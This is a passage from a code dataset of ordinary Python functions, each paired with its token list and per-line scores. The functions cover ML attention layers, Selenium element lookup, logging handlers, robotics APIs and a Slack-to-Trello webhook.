v: The attention values for each node and edge type (shape [B, N*T, V]).
"""
# node_states is initially a tensor with shape [B, N, D]. The call to dense
# creates a D x K kernel that serves as a fully-connected layer.
#
# For each possible batch b and node n in the first two dimensions of
# node_states, the corresponding size-D vector (the third dimension of
# node_states) is the hidden state for node n in batch b. Each of these size-D
# vectors is multiplied by the kernel to produce an attention query of size K.
# The result is a tensor of size [B, N, K] containing the attention queries
# for each node in each batch.
q = common_layers.dense(
node_states, total_key_depth, use_bias=False, name="q_mpnn")
# Creates the attention keys in a manner similar to the process of creating
# the attention queries. One key is created for each type of outgoing edge the
# corresponding node might have, meaning k will have shape [B, N, K*T].
k = _compute_edge_transforms(node_states,
total_key_depth,
num_transforms,
name="k_mpnn")
v = _compute_edge_transforms(node_states,
total_value_depth,
num_transforms,
name="v_mpnn")
return q, k, v | [
"def",
"compute_mpnn_qkv",
"(",
"node_states",
",",
"total_key_depth",
",",
"total_value_depth",
",",
"num_transforms",
")",
":",
"# node_states is initially a tensor with shape [B, N, D]. The call to dense",
"# creates a D x K kernel that serves as a fully-connected layer.",
"#",
"# For each possible batch b and node n in the first two dimensions of",
"# node_states, the corresponding size-D vector (the third dimension of",
"# node_states) is the hidden state for node n in batch b. Each of these size-D",
"# vectors is multiplied by the kernel to produce an attention query of size K.",
"# The result is a tensor of size [B, N, K] containing the attention queries",
"# for each node in each batch.",
"q",
"=",
"common_layers",
".",
"dense",
"(",
"node_states",
",",
"total_key_depth",
",",
"use_bias",
"=",
"False",
",",
"name",
"=",
"\"q_mpnn\"",
")",
"# Creates the attention keys in a manner similar to the process of creating",
"# the attention queries. One key is created for each type of outgoing edge the",
"# corresponding node might have, meaning k will have shape [B, N, K*T].",
"k",
"=",
"_compute_edge_transforms",
"(",
"node_states",
",",
"total_key_depth",
",",
"num_transforms",
",",
"name",
"=",
"\"k_mpnn\"",
")",
"v",
"=",
"_compute_edge_transforms",
"(",
"node_states",
",",
"total_value_depth",
",",
"num_transforms",
",",
"name",
"=",
"\"v_mpnn\"",
")",
"return",
"q",
",",
"k",
",",
"v"
] | 47.606557 | [
0.06060606060606061,
0.08108108108108109,
0.07692307692307693,
0.10810810810810811,
0.03773584905660377,
0,
0.09090909090909091,
0.06818181818181818,
0.06521739130434782,
0.058823529411764705,
0.0625,
0.06779661016949153,
0,
0.05454545454545454,
0.04,
0.02702702702702703,
0.07692307692307693,
0.05,
0.0375,
0.06896551724137931,
0.0379746835443038,
0.02702702702702703,
0.02564102564102564,
0,
0.42857142857142855,
0.06382978723404255,
0.08333333333333333,
0.07894736842105263,
0.04054054054054054,
0.07317073170731707,
0.3,
0.0547945205479452,
0.05405405405405406,
0.05263157894736842,
0.4,
0,
0.03896103896103896,
0.045454545454545456,
1,
0.04225352112676056,
0.041666666666666664,
0.05,
0.05,
0.03896103896103896,
0.09375,
0.15384615384615385,
0.09090909090909091,
0,
0.03896103896103896,
0.05,
0.0410958904109589,
0.09302325581395349,
0.06382978723404255,
0.06521739130434782,
0.1111111111111111,
0.09302325581395349,
0.061224489795918366,
0.06521739130434782,
0.1111111111111111,
0,
0.1875
] |
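A shape-only sketch for the `compute_mpnn_qkv` record above, assuming TensorFlow 1.x-style graph tensors as in tensor2tensor; the concrete sizes are arbitrary.

import tensorflow as tf

# B=2 batches, N=5 nodes, D=16 hidden units, K=V=8, T=3 edge types.
node_states = tf.zeros([2, 5, 16])
q, k, v = compute_mpnn_qkv(node_states,
                           total_key_depth=8,
                           total_value_depth=8,
                           num_transforms=3)
# Expected shapes: q -> [2, 5, 8], k -> [2, 15, 8], v -> [2, 15, 8].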
def location(self):
"""Return the location of the printer."""
try:
return self.data.get('identity').get('location')
except (KeyError, AttributeError):
return self.device_status_simple('') | [
"def",
"location",
"(",
"self",
")",
":",
"try",
":",
"return",
"self",
".",
"data",
".",
"get",
"(",
"'identity'",
")",
".",
"get",
"(",
"'location'",
")",
"except",
"(",
"KeyError",
",",
"AttributeError",
")",
":",
"return",
"self",
".",
"device_status_simple",
"(",
"''",
")"
] | 39.166667 | [
0.05,
0.02,
0.23076923076923078,
0.01639344262295082,
0.06976744186046512,
0.041666666666666664
] |
def find_elements(self, by=By.ID, value=None):
"""
Find elements given a By strategy and locator. Prefer the find_elements_by_* methods when
possible.
:Usage:
::
elements = driver.find_elements(By.CLASS_NAME, 'foo')
:rtype: list of WebElement
"""
if self.w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
# Return empty list if driver returns null
# See https://github.com/SeleniumHQ/selenium/issues/4555
return self.execute(Command.FIND_ELEMENTS, {
'using': by,
'value': value})['value'] or [] | [
"def",
"find_elements",
"(",
"self",
",",
"by",
"=",
"By",
".",
"ID",
",",
"value",
"=",
"None",
")",
":",
"if",
"self",
".",
"w3c",
":",
"if",
"by",
"==",
"By",
".",
"ID",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"value",
"=",
"'[id=\"%s\"]'",
"%",
"value",
"elif",
"by",
"==",
"By",
".",
"TAG_NAME",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"elif",
"by",
"==",
"By",
".",
"CLASS_NAME",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"value",
"=",
"\".%s\"",
"%",
"value",
"elif",
"by",
"==",
"By",
".",
"NAME",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"value",
"=",
"'[name=\"%s\"]'",
"%",
"value",
"# Return empty list if driver returns null",
"# See https://github.com/SeleniumHQ/selenium/issues/4555",
"return",
"self",
".",
"execute",
"(",
"Command",
".",
"FIND_ELEMENTS",
",",
"{",
"'using'",
":",
"by",
",",
"'value'",
":",
"value",
"}",
")",
"[",
"'value'",
"]",
"or",
"[",
"]"
] | 32.2 | [
0.021739130434782608,
0.18181818181818182,
0.041237113402061855,
0.11764705882352941,
0,
0.2,
0.21428571428571427,
0,
0.028985507246376812,
0,
0.08823529411764706,
0.18181818181818182,
0.1,
0.07407407407407407,
0.05555555555555555,
0.046511627906976744,
0.05714285714285714,
0.05555555555555555,
0.05405405405405406,
0.05555555555555555,
0.05405405405405406,
0.06451612903225806,
0.05555555555555555,
0.044444444444444446,
0,
0.04,
0.03125,
0.057692307692307696,
0.08333333333333333,
0.06976744186046512
] |
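A usage sketch for the `find_elements` record above, mirroring its own docstring example; the URL is a placeholder.

from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Firefox()
driver.get('https://example.com')
# Under a W3C driver, non-CSS strategies are rewritten to CSS selectors above.
elements = driver.find_elements(By.CLASS_NAME, 'foo')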
def read_PIA0_B_control(self, cpu_cycles, op_address, address):
"""
read from 0xff03 -> PIA 0 B side Control reg.
"""
value = self.pia_0_B_control.value
log.error(
"%04x| read $%04x (PIA 0 B side Control reg.) send $%02x (%s) back.\t|%s",
op_address, address, value, byte2bit_string(value),
self.cfg.mem_info.get_shortest(op_address)
)
return value | [
"def",
"read_PIA0_B_control",
"(",
"self",
",",
"cpu_cycles",
",",
"op_address",
",",
"address",
")",
":",
"value",
"=",
"self",
".",
"pia_0_B_control",
".",
"value",
"log",
".",
"error",
"(",
"\"%04x| read $%04x (PIA 0 B side Control reg.) send $%02x (%s) back.\\t|%s\"",
",",
"op_address",
",",
"address",
",",
"value",
",",
"byte2bit_string",
"(",
"value",
")",
",",
"self",
".",
"cfg",
".",
"mem_info",
".",
"get_shortest",
"(",
"op_address",
")",
")",
"return",
"value"
] | 39.090909 | [
0.015873015873015872,
0.18181818181818182,
0.03773584905660377,
0.18181818181818182,
0.047619047619047616,
0.16666666666666666,
0.03488372093023256,
0.031746031746031744,
0.037037037037037035,
0.3333333333333333,
0.1
] |
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
db.connections.close_all() # Close any old connections
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_("reincarnated monitor {} after sudden death").format(process.name))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_("reincarnated pusher {} after sudden death").format(process.name))
else:
self.pool.remove(process)
self.spawn_worker()
if process.timer.value == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warn(_("reincarnated worker {} after timeout").format(process.name))
elif int(process.timer.value) == -2:
logger.info(_("recycled worker {}").format(process.name))
else:
logger.error(_("reincarnated worker {} after death").format(process.name))
self.reincarnations += 1 | [
"def",
"reincarnate",
"(",
"self",
",",
"process",
")",
":",
"db",
".",
"connections",
".",
"close_all",
"(",
")",
"# Close any old connections",
"if",
"process",
"==",
"self",
".",
"monitor",
":",
"self",
".",
"monitor",
"=",
"self",
".",
"spawn_monitor",
"(",
")",
"logger",
".",
"error",
"(",
"_",
"(",
"\"reincarnated monitor {} after sudden death\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"elif",
"process",
"==",
"self",
".",
"pusher",
":",
"self",
".",
"pusher",
"=",
"self",
".",
"spawn_pusher",
"(",
")",
"logger",
".",
"error",
"(",
"_",
"(",
"\"reincarnated pusher {} after sudden death\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"else",
":",
"self",
".",
"pool",
".",
"remove",
"(",
"process",
")",
"self",
".",
"spawn_worker",
"(",
")",
"if",
"process",
".",
"timer",
".",
"value",
"==",
"0",
":",
"# only need to terminate on timeout, otherwise we risk destabilizing the queues",
"process",
".",
"terminate",
"(",
")",
"logger",
".",
"warn",
"(",
"_",
"(",
"\"reincarnated worker {} after timeout\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"elif",
"int",
"(",
"process",
".",
"timer",
".",
"value",
")",
"==",
"-",
"2",
":",
"logger",
".",
"info",
"(",
"_",
"(",
"\"recycled worker {}\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"else",
":",
"logger",
".",
"error",
"(",
"_",
"(",
"\"reincarnated worker {} after death\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"self",
".",
"reincarnations",
"+=",
"1"
] | 46.24 | [
0.03225806451612903,
0.18181818181818182,
0.06,
0.07894736842105263,
0.18181818181818182,
0.031746031746031744,
0.05714285714285714,
0.0425531914893617,
0.031914893617021274,
0.05555555555555555,
0.044444444444444446,
0.03225806451612903,
0.15384615384615385,
0.05405405405405406,
0.06451612903225806,
0.05,
0.031578947368421054,
0.05714285714285714,
0.03296703296703297,
0.041666666666666664,
0.0273972602739726,
0.11764705882352941,
0.03333333333333333,
0,
0.0625
] |
def emit(self, record):
"""Actually log the specified logging record.
Overrides the default emit behavior of ``StreamHandler``.
See https://docs.python.org/2/library/logging.html#handler-objects
:type record: :class:`logging.LogRecord`
:param record: The record to be logged.
"""
message = super(CloudLoggingHandler, self).format(record)
self.transport.send(record, message, resource=self.resource, labels=self.labels) | [
"def",
"emit",
"(",
"self",
",",
"record",
")",
":",
"message",
"=",
"super",
"(",
"CloudLoggingHandler",
",",
"self",
")",
".",
"format",
"(",
"record",
")",
"self",
".",
"transport",
".",
"send",
"(",
"record",
",",
"message",
",",
"resource",
"=",
"self",
".",
"resource",
",",
"labels",
"=",
"self",
".",
"labels",
")"
] | 39.5 | [
0.043478260869565216,
0.03773584905660377,
0,
0.046153846153846156,
0,
0.06756756756756757,
0,
0.14583333333333334,
0.06382978723404255,
0.18181818181818182,
0.03076923076923077,
0.03409090909090909
] |
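A hedged wiring sketch for the `emit` record above; the CloudLoggingHandler import path has moved between google-cloud-logging releases, so treat it as approximate.

import logging

from google.cloud import logging as gcp_logging
from google.cloud.logging.handlers import CloudLoggingHandler

client = gcp_logging.Client()
handler = CloudLoggingHandler(client)
logging.getLogger().addHandler(handler)
logging.warning('this record is formatted and shipped by emit() above')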
def from_mapping(cls, evidence_mapping):
"""Create an Evidence instance from the given mapping
:param evidence_mapping: a mapping (e.g. dict) of values provided by Watson
:return: a new Evidence
"""
return cls(metadata_map=MetadataMap.from_mapping(evidence_mapping['metadataMap']),
copyright=evidence_mapping['copyright'],
id=evidence_mapping['id'],
terms_of_use=evidence_mapping['termsOfUse'],
document=evidence_mapping['document'],
title=evidence_mapping['title'],
text=evidence_mapping['text'],
value=evidence_mapping['value']) | [
"def",
"from_mapping",
"(",
"cls",
",",
"evidence_mapping",
")",
":",
"return",
"cls",
"(",
"metadata_map",
"=",
"MetadataMap",
".",
"from_mapping",
"(",
"evidence_mapping",
"[",
"'metadataMap'",
"]",
")",
",",
"copyright",
"=",
"evidence_mapping",
"[",
"'copyright'",
"]",
",",
"id",
"=",
"evidence_mapping",
"[",
"'id'",
"]",
",",
"terms_of_use",
"=",
"evidence_mapping",
"[",
"'termsOfUse'",
"]",
",",
"document",
"=",
"evidence_mapping",
"[",
"'document'",
"]",
",",
"title",
"=",
"evidence_mapping",
"[",
"'title'",
"]",
",",
"text",
"=",
"evidence_mapping",
"[",
"'text'",
"]",
",",
"value",
"=",
"evidence_mapping",
"[",
"'value'",
"]",
")"
] | 49.357143 | [
0.025,
0.03278688524590164,
0,
0.060240963855421686,
0.0967741935483871,
0.18181818181818182,
0.044444444444444446,
0.06779661016949153,
0.08888888888888889,
0.06349206349206349,
0.07017543859649122,
0.0784313725490196,
0.08163265306122448,
0.09803921568627451
] |
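An illustrative mapping for the `from_mapping` record above, using exactly the keys it reads; the values, and the assumption that MetadataMap.from_mapping accepts this metadata dict, are made up.

evidence = Evidence.from_mapping({
    'metadataMap': {'originalFile': 'corpus/doc-9.xml'},
    'copyright': 'IBM 2014',
    'id': 'ev-1',
    'termsOfUse': 'internal',
    'document': 'doc-9',
    'title': 'Sample passage',
    'text': 'The passage Watson cited...',
    'value': 0.83,
})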
def simxGetObjectPosition(clientID, objectHandle, relativeToObjectHandle, operationMode):
'''
Please have a look at the function description/documentation in the V-REP user manual
'''
position = (ct.c_float*3)()
ret = c_GetObjectPosition(clientID, objectHandle, relativeToObjectHandle, position, operationMode)
arr = []
for i in range(3):
arr.append(position[i])
return ret, arr | [
"def",
"simxGetObjectPosition",
"(",
"clientID",
",",
"objectHandle",
",",
"relativeToObjectHandle",
",",
"operationMode",
")",
":",
"position",
"=",
"(",
"ct",
".",
"c_float",
"*",
"3",
")",
"(",
")",
"ret",
"=",
"c_GetObjectPosition",
"(",
"clientID",
",",
"objectHandle",
",",
"relativeToObjectHandle",
",",
"position",
",",
"operationMode",
")",
"arr",
"=",
"[",
"]",
"for",
"i",
"in",
"range",
"(",
"3",
")",
":",
"arr",
".",
"append",
"(",
"position",
"[",
"i",
"]",
")",
"return",
"ret",
",",
"arr"
] | 40.9 | [
0.02247191011235955,
0.2857142857142857,
0.033707865168539325,
0.2857142857142857,
0.06451612903225806,
0.029411764705882353,
0.16666666666666666,
0.09090909090909091,
0.06451612903225806,
0.10526315789473684
] |
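A hedged remote-API sketch for the `simxGetObjectPosition` record above, following the usual V-REP calling pattern; the handles and the blocking opmode constant are assumed from the standard bindings.

# clientID comes from simxStart(), objectHandle from simxGetObjectHandle();
# -1 asks for coordinates relative to the world frame.
ret, (x, y, z) = simxGetObjectPosition(clientID, objectHandle, -1,
                                       simx_opmode_blocking)
if ret == 0:  # simx_return_ok
    print('object at', x, y, z)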
def _setup(self):
"""Setup the layer two agent."""
super(HyperVNeutronAgent, self)._setup()
self._sg_plugin_rpc = sg_rpc.SecurityGroupServerRpcApi(topics.PLUGIN)
self._sec_groups_agent = HyperVSecurityAgent(self._context,
self._sg_plugin_rpc)
self._vlan_driver = trunk_driver.HyperVTrunkDriver(self._context)
if CONF.NVGRE.enable_support:
self._consumers.append([h_constant.TUNNEL, topics.UPDATE])
self._consumers.append([h_constant.LOOKUP, h_constant.UPDATE]) | [
"def",
"_setup",
"(",
"self",
")",
":",
"super",
"(",
"HyperVNeutronAgent",
",",
"self",
")",
".",
"_setup",
"(",
")",
"self",
".",
"_sg_plugin_rpc",
"=",
"sg_rpc",
".",
"SecurityGroupServerRpcApi",
"(",
"topics",
".",
"PLUGIN",
")",
"self",
".",
"_sec_groups_agent",
"=",
"HyperVSecurityAgent",
"(",
"self",
".",
"_context",
",",
"self",
".",
"_sg_plugin_rpc",
")",
"self",
".",
"_vlan_driver",
"=",
"trunk_driver",
".",
"HyperVTrunkDriver",
"(",
"self",
".",
"_context",
")",
"if",
"CONF",
".",
"NVGRE",
".",
"enable_support",
":",
"self",
".",
"_consumers",
".",
"append",
"(",
"[",
"h_constant",
".",
"TUNNEL",
",",
"topics",
".",
"UPDATE",
"]",
")",
"self",
".",
"_consumers",
".",
"append",
"(",
"[",
"h_constant",
".",
"LOOKUP",
",",
"h_constant",
".",
"UPDATE",
"]",
")"
] | 52.363636 | [
0.058823529411764705,
0.05,
0.041666666666666664,
0,
0.025974025974025976,
0.04477611940298507,
0.0547945205479452,
0.0273972602739726,
0.05405405405405406,
0.02857142857142857,
0.02702702702702703
] |
def prompt_choice(prompt, possibilities, default=None, only_in_poss=True,
show_default=True, prompt_suffix=': ', color=None):
"""
Prompt for a string in a given range of possibilities.
This also sets the history to the list of possibilities so
    the user can scroll it with the arrow keys to find what they want.
If only_in_poss is False, you are not guaranteed that this
will return one of the possibilities.
"""
assert len(possibilities) >= 1
    assert not only_in_poss or default is None or default in possibilities, '%s not in possibilities' % default
contains_spaces = any(' ' in poss for poss in possibilities)
possibilities = sorted(possibilities)
readline.clear_history()
for kw in possibilities:
readline.add_history(kw)
def complete(text):
return [t for t in possibilities if t.startswith(text)]
while 1:
r = prompt_autocomplete(prompt, complete, default, contains_spaces=contains_spaces,
show_default=show_default, prompt_suffix=prompt_suffix, color=color)
if not only_in_poss or r in possibilities:
break
print('%s is not a possibility.' % r)
readline.clear_history()
return r | [
"def",
"prompt_choice",
"(",
"prompt",
",",
"possibilities",
",",
"default",
"=",
"None",
",",
"only_in_poss",
"=",
"True",
",",
"show_default",
"=",
"True",
",",
"prompt_suffix",
"=",
"': '",
",",
"color",
"=",
"None",
")",
":",
"assert",
"len",
"(",
"possibilities",
")",
">=",
"1",
"assert",
"not",
"only_in_poss",
"or",
"default",
"is",
"None",
"or",
"default",
"in",
"possibilities",
",",
"'$s not in possibilities'",
"%",
"default",
"contains_spaces",
"=",
"any",
"(",
"' '",
"in",
"poss",
"for",
"poss",
"in",
"possibilities",
")",
"possibilities",
"=",
"sorted",
"(",
"possibilities",
")",
"readline",
".",
"clear_history",
"(",
")",
"for",
"kw",
"in",
"possibilities",
":",
"readline",
".",
"add_history",
"(",
"kw",
")",
"def",
"complete",
"(",
"text",
")",
":",
"return",
"[",
"t",
"for",
"t",
"in",
"possibilities",
"if",
"t",
".",
"startswith",
"(",
"text",
")",
"]",
"while",
"1",
":",
"r",
"=",
"prompt_autocomplete",
"(",
"prompt",
",",
"complete",
",",
"default",
",",
"contains_spaces",
"=",
"contains_spaces",
",",
"show_default",
"=",
"show_default",
",",
"prompt_suffix",
"=",
"prompt_suffix",
",",
"color",
"=",
"color",
")",
"if",
"not",
"only_in_poss",
"or",
"r",
"in",
"possibilities",
":",
"break",
"print",
"(",
"'%s is not a possibility.'",
"%",
"r",
")",
"readline",
".",
"clear_history",
"(",
")",
"return",
"r"
] | 35.228571 | [
0.04054054054054054,
0.10144927536231885,
0.2857142857142857,
0.034482758620689655,
0,
0.03225806451612903,
0.03076923076923077,
0.03225806451612903,
0.04878048780487805,
0.2857142857142857,
0,
0.058823529411764705,
0.02702702702702703,
0,
0.03125,
0,
0.04878048780487805,
0,
0.07142857142857142,
0.07142857142857142,
0.0625,
0,
0.08695652173913043,
0.031746031746031744,
0,
0.16666666666666666,
0.05434782608695652,
0.07,
0.04,
0.11764705882352941,
0.044444444444444446,
0.25,
0.07142857142857142,
0,
0.16666666666666666
] |
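A usage sketch for the `prompt_choice` record above; the choices are arbitrary.

colour = prompt_choice('Favourite colour',
                       ['blue', 'green', 'red'],
                       default='red')
# The three options seed tab completion and arrow-key history; anything else
# is rejected while only_in_poss stays True.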
def mail_admins(subject, message, fail_silently=False, connection=None,
html_message=None):
"""Sends a message to the admins, as defined by the DBBACKUP_ADMINS setting."""
if not settings.ADMINS:
return
mail = EmailMultiAlternatives('%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message, settings.SERVER_EMAIL, [a[1] for a in settings.ADMINS],
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently) | [
"def",
"mail_admins",
"(",
"subject",
",",
"message",
",",
"fail_silently",
"=",
"False",
",",
"connection",
"=",
"None",
",",
"html_message",
"=",
"None",
")",
":",
"if",
"not",
"settings",
".",
"ADMINS",
":",
"return",
"mail",
"=",
"EmailMultiAlternatives",
"(",
"'%s%s'",
"%",
"(",
"settings",
".",
"EMAIL_SUBJECT_PREFIX",
",",
"subject",
")",
",",
"message",
",",
"settings",
".",
"SERVER_EMAIL",
",",
"[",
"a",
"[",
"1",
"]",
"for",
"a",
"in",
"settings",
".",
"ADMINS",
"]",
",",
"connection",
"=",
"connection",
")",
"if",
"html_message",
":",
"mail",
".",
"attach_alternative",
"(",
"html_message",
",",
"'text/html'",
")",
"mail",
".",
"send",
"(",
"fail_silently",
"=",
"fail_silently",
")"
] | 53.454545 | [
0.028169014084507043,
0.11428571428571428,
0.03614457831325301,
0.07407407407407407,
0.14285714285714285,
0.047619047619047616,
0.04081632653061224,
0.08928571428571429,
0.1,
0.034482758620689655,
0.047619047619047616
] |
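An illustrative call for the `mail_admins` record above; it returns silently when settings.ADMINS is empty.

mail_admins('Backup finished',
            'Nightly dump completed without errors.',
            html_message='<p>Nightly dump completed <b>without errors</b>.</p>')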
def compute(self, activeColumns, predictedColumns,
inputValue=None, timestamp=None):
"""Compute the anomaly score as the percent of active columns not predicted.
:param activeColumns: array of active column indices
:param predictedColumns: array of columns indices predicted in this step
(used for anomaly in step T+1)
:param inputValue: (optional) value of current input to encoders
(eg "cat" for category encoder)
(used in anomaly-likelihood)
    :param timestamp: (optional) date timestamp when the sample occurred
(used in anomaly-likelihood)
:returns: the computed anomaly score; float 0..1
"""
# Start by computing the raw anomaly score.
anomalyScore = computeRawAnomalyScore(activeColumns, predictedColumns)
# Compute final anomaly based on selected mode.
if self._mode == Anomaly.MODE_PURE:
score = anomalyScore
elif self._mode == Anomaly.MODE_LIKELIHOOD:
if inputValue is None:
raise ValueError("Selected anomaly mode 'Anomaly.MODE_LIKELIHOOD' "
"requires 'inputValue' as parameter to compute() method. ")
probability = self._likelihood.anomalyProbability(
inputValue, anomalyScore, timestamp)
# low likelihood -> hi anomaly
score = 1 - probability
elif self._mode == Anomaly.MODE_WEIGHTED:
probability = self._likelihood.anomalyProbability(
inputValue, anomalyScore, timestamp)
score = anomalyScore * (1 - probability)
# Last, do moving-average if windowSize was specified.
if self._movingAverage is not None:
score = self._movingAverage.next(score)
# apply binary discretization if required
if self._binaryThreshold is not None:
if score >= self._binaryThreshold:
score = 1.0
else:
score = 0.0
return score | [
"def",
"compute",
"(",
"self",
",",
"activeColumns",
",",
"predictedColumns",
",",
"inputValue",
"=",
"None",
",",
"timestamp",
"=",
"None",
")",
":",
"# Start by computing the raw anomaly score.",
"anomalyScore",
"=",
"computeRawAnomalyScore",
"(",
"activeColumns",
",",
"predictedColumns",
")",
"# Compute final anomaly based on selected mode.",
"if",
"self",
".",
"_mode",
"==",
"Anomaly",
".",
"MODE_PURE",
":",
"score",
"=",
"anomalyScore",
"elif",
"self",
".",
"_mode",
"==",
"Anomaly",
".",
"MODE_LIKELIHOOD",
":",
"if",
"inputValue",
"is",
"None",
":",
"raise",
"ValueError",
"(",
"\"Selected anomaly mode 'Anomaly.MODE_LIKELIHOOD' \"",
"\"requires 'inputValue' as parameter to compute() method. \"",
")",
"probability",
"=",
"self",
".",
"_likelihood",
".",
"anomalyProbability",
"(",
"inputValue",
",",
"anomalyScore",
",",
"timestamp",
")",
"# low likelihood -> hi anomaly",
"score",
"=",
"1",
"-",
"probability",
"elif",
"self",
".",
"_mode",
"==",
"Anomaly",
".",
"MODE_WEIGHTED",
":",
"probability",
"=",
"self",
".",
"_likelihood",
".",
"anomalyProbability",
"(",
"inputValue",
",",
"anomalyScore",
",",
"timestamp",
")",
"score",
"=",
"anomalyScore",
"*",
"(",
"1",
"-",
"probability",
")",
"# Last, do moving-average if windowSize was specified.",
"if",
"self",
".",
"_movingAverage",
"is",
"not",
"None",
":",
"score",
"=",
"self",
".",
"_movingAverage",
".",
"next",
"(",
"score",
")",
"# apply binary discretization if required",
"if",
"self",
".",
"_binaryThreshold",
"is",
"not",
"None",
":",
"if",
"score",
">=",
"self",
".",
"_binaryThreshold",
":",
"score",
"=",
"1.0",
"else",
":",
"score",
"=",
"0.0",
"return",
"score"
] | 41.521739 | [
0.04,
0.1276595744680851,
0.0375,
0,
0.05357142857142857,
0.039473684210526314,
0.05084745762711865,
0.04411764705882353,
0.046153846153846156,
0.04838709677419355,
0.04225352112676056,
0.04918032786885246,
0.07692307692307693,
0.2857142857142857,
0.0425531914893617,
0.02702702702702703,
0,
0.0392156862745098,
0.05128205128205128,
0.11538461538461539,
0.0425531914893617,
0.10714285714285714,
0.04,
0.05263157894736842,
0,
0.07142857142857142,
0.08695652173913043,
0.08333333333333333,
0.10344827586206896,
0.044444444444444446,
0.07142857142857142,
0.08695652173913043,
0.06521739130434782,
0,
0.034482758620689655,
0.05128205128205128,
0.06666666666666667,
0,
0.044444444444444446,
0.04878048780487805,
0.075,
0.10526315789473684,
0.2727272727272727,
0.10526315789473684,
0,
0.125
] |
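A hedged sketch for the anomaly `compute` record above in MODE_LIKELIHOOD, the branch that requires inputValue; `anomaly` stands for an instance constructed with that mode, and the column arrays are toy data.

import datetime

score = anomaly.compute(
    activeColumns=[2, 7, 11],
    predictedColumns=[2, 9],
    inputValue=42.0,  # mandatory in MODE_LIKELIHOOD
    timestamp=datetime.datetime(2024, 1, 1))
# score = 1 - likelihood, so improbable inputs land near 1.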
def _get_interface_name_from_hosting_port(self, port):
"""
Extract the underlying subinterface name for a port
e.g. Port-channel10.200 or GigabitEthernet0/0/0.500
"""
try:
vlan = port['hosting_info']['segmentation_id']
int_prefix = port['hosting_info']['physical_interface']
return '%s.%s' % (int_prefix, vlan)
except KeyError as e:
params = {'key': e}
raise cfg_exc.DriverExpectedKeyNotSetException(**params) | [
"def",
"_get_interface_name_from_hosting_port",
"(",
"self",
",",
"port",
")",
":",
"try",
":",
"vlan",
"=",
"port",
"[",
"'hosting_info'",
"]",
"[",
"'segmentation_id'",
"]",
"int_prefix",
"=",
"port",
"[",
"'hosting_info'",
"]",
"[",
"'physical_interface'",
"]",
"return",
"'%s.%s'",
"%",
"(",
"int_prefix",
",",
"vlan",
")",
"except",
"KeyError",
"as",
"e",
":",
"params",
"=",
"{",
"'key'",
":",
"e",
"}",
"raise",
"cfg_exc",
".",
"DriverExpectedKeyNotSetException",
"(",
"*",
"*",
"params",
")"
] | 42.166667 | [
0.018518518518518517,
0.18181818181818182,
0.03389830508474576,
0.03389830508474576,
0.18181818181818182,
0.16666666666666666,
0.034482758620689655,
0.029850746268656716,
0.0425531914893617,
0.06896551724137931,
0.06451612903225806,
0.029411764705882353
] |
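An illustrative hosting-port mapping for the record above, echoing the docstring's own example; `driver` is a hypothetical instance of the owning class.

port = {'hosting_info': {'segmentation_id': 500,
                         'physical_interface': 'GigabitEthernet0/0/0'}}
name = driver._get_interface_name_from_hosting_port(port)
# -> 'GigabitEthernet0/0/0.500'; a missing key raises
# DriverExpectedKeyNotSetException rather than a bare KeyError.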
def slack_message():
"""When we receive a message from Slack, generate a Trello card and reply"""
# Incoming request format:
# token=TOKEN
# team_id=T0001
# team_domain=example
# channel_id=C12345
# channel_name=test
# user_id=U12345
# user_name=Steve
# command=/weather
# text=94070
# Verify Slack token lines up
if request.form['token'] != SLACK_TOKEN:
return ('Provided Slack token from message didn\'t match our server\'s Slack token. '
'Please double check they are aligned', 403)
# Extract our text and make a card
text = request.form['text']
user_name = request.form['user_name']
# Pre-emptively extract channel name before taking actions (transaction-esque)
channel_name = request.form['channel_name']
card = make_trello_card(name='{text} ({user_name})'.format(text=text, user_name=user_name))
# Send a message to Slack about our success
# TODO: Escape our content
send_slack_message(channel='#{channel_name}'.format(channel_name=channel_name),
text='Trello card "<{url}|{text}>" created by "{user_name}"'
.format(url=card.url, text=text, user_name=user_name))
# Reply with nothing (as the external message does more)
return '' | [
"def",
"slack_message",
"(",
")",
":",
"# Incoming request format:",
"# token=TOKEN",
"# team_id=T0001",
"# team_domain=example",
"# channel_id=C12345",
"# channel_name=test",
"# user_id=U12345",
"# user_name=Steve",
"# command=/weather",
"# text=94070",
"# Verify Slack token lines up",
"if",
"request",
".",
"form",
"[",
"'token'",
"]",
"!=",
"SLACK_TOKEN",
":",
"return",
"(",
"'Provided Slack token from message didn\\'t match our server\\'s Slack token. '",
"'Please double check they are aligned'",
",",
"403",
")",
"# Extract our text and make a card",
"text",
"=",
"request",
".",
"form",
"[",
"'text'",
"]",
"user_name",
"=",
"request",
".",
"form",
"[",
"'user_name'",
"]",
"# Pre-emptively extract channel name before taking actions (transaction-esque)",
"channel_name",
"=",
"request",
".",
"form",
"[",
"'channel_name'",
"]",
"card",
"=",
"make_trello_card",
"(",
"name",
"=",
"'{text} ({user_name})'",
".",
"format",
"(",
"text",
"=",
"text",
",",
"user_name",
"=",
"user_name",
")",
")",
"# Send a message to Slack about our success",
"# TODO: Escape our content",
"send_slack_message",
"(",
"channel",
"=",
"'#{channel_name}'",
".",
"format",
"(",
"channel_name",
"=",
"channel_name",
")",
",",
"text",
"=",
"'Trello card \"<{url}|{text}>\" created by \"{user_name}\"'",
".",
"format",
"(",
"url",
"=",
"card",
".",
"url",
",",
